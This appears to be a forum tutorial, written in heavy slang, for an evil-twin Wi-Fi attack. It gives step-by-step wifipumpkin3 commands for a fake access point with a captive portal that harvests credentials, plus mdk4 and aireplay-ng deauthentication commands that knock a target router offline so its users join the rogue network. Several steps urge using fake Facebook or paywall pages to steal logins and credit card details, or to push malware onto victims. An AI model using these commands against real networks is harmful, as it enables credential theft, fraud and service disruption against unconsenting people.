Make sure you got your Alfa network cards all plugged in and hooked up to your Kali VM before you kick off this tool, mate.
If you're gonna keep tryin' this out loads, make sure to bin the network on your device you used for testin' and fire up wifipumpkin3 again before havin' another go or you'll run into problems.
Plus, every gadget will have its own vibe with your dodgy AP, so give it a whirl on all your bits and bobs to suss out the ups and downs of this gizmo. Nothin's spot on, innit?
1.- Type in terminal:
Code: Select all
sudo airmon-ng check kill
sudo wifipumpkin3
sudo wifipumpkin3 -i INTERFACE
apExample: sudo wifipumpkin3 -i wlan1
2.- Check it out - the standard SSID for the AP is "WiFi Pumpkin 3". We can switch that up to anythin' we fancy usin' the "set ssid" command. For this gig, let's call our AP "TESTWIFI".
Code: Select all
set ssid TESTWIFI
proxies3.- There's bare proxies we can use with this tool, but we're gonna make a captive portal for muppets to link up to our AP to try and nick some creds. We'll be using the "captiveflask" proxy to make a captiveportal.
Code: Select all
ignore pydns_server
set plugin sniffkin3 false
set proxy captiveflask
proxies4.- We're on the 'captiveflask' proxy now, innit? Check it, there's bare Captive Portal plugins to pick from. For now, we'll keep it on the standard DarkLogin vibe so you can clock what's what. Cool, grab your blower or another laptop/puter and cut the Wi-Fi so you can peep the fresh AP you're gonna make.
Code: Select all
start5.- When you clock "Running on h t t p ://0.0.0.0:80/", your dodgy AP is up and running. Grab your blower or laptop, flick the Wi-Fi back on, and start hunting for "TESTWIFI". Once you spot the Wi-Fi, jump on it to see what's popping on that gizmo. When you hit the captive portal screen, slap in USERNAME for the handle and PASSWORD for the code, then hit "SIGN IN" while keeping an eye on the wifipumpkin3 console to peep the deets on the screen.
6.- Alright mate, let's park our attack for a bit.
Code: Select all
stop7.- Check this out - you can make your own Wi-Fi hotspot, pick what you want, set up a fancy portal that pops up when someone jumps on it, and grab all the info they type in. You can go wild with it - like setting up a "Free Wi-Fi" spot with a Facebook login page to nab those FB deets, or trick folks into giving up their cc info with a fake paywall site, or even send some dodgy stuff to your targets. Sky's the limit, innit?
8.- Alright, listen up. Make sure you're on the ball with that Router DoS, but give it a whirl first before you go all out on others, yeah?
Type in terminal:
Code: Select all
sudo airmon-ng check kill
sudo airmon-ng start INTERFACE9.- We gotta find the Wi-Fi network we're after and grab the BSSID:
Code: Select all
sudo airodump-ng INTERFACE10.- Once you've clocked the BSSID of your target, just hold down "CTRL" and tap "C" on your keyboard. Look, we've got the deets now to jam that router, we've got the BSSID. Easy peasy!
11.- Most home routers ain't gonna last long against this kind of hit, but with all the routers about, you'll suss it out. When you kick off the DoS attack, give it 3 - 5 minutes before you fire up your dodgy AP with wifipumpkin3 to make sure that Wi-Fi network's gone. Sooner or later, someone will clock their Wi-Fi's down, tempting them to jump on your fake AP. And when they do, bam, they'll be staring at your dodgy portal page. And yeah, you can make that page to nick their deets for X or drop some malware on 'em.
12.- We smash Wi-Fi routers using a mix of tricks, like De-Authing the whole network to knock the router out or stop anyone from jumping on.
In new terminal:
Code: Select all
sudo mdk4 INTERFACE a -a E0:AC:BF:0C:0F:00
sudo aireplay-ng --deauth 0 -a E0:AC:BF:0C:0F:00 INTERFACE(E0:AC:BF:0C:0F:00 IS THE BSSID OF THE WIFI, INTERFACE MAY wlan0/wlan1).
13.- Some folks'll clock that their router's MIA for a hookup, while others might spot it online but can't get in. It all hinges on the kind of router you're gunning for. Even if you spot your Wi-Fi up for grabs, you won't actually get in. Now, fire up your dodgy AP with wifipumpkin3 using your other Wi-Fi card, chill out for the peeps to jump on, and watch 'em walk straight into your wicked setup.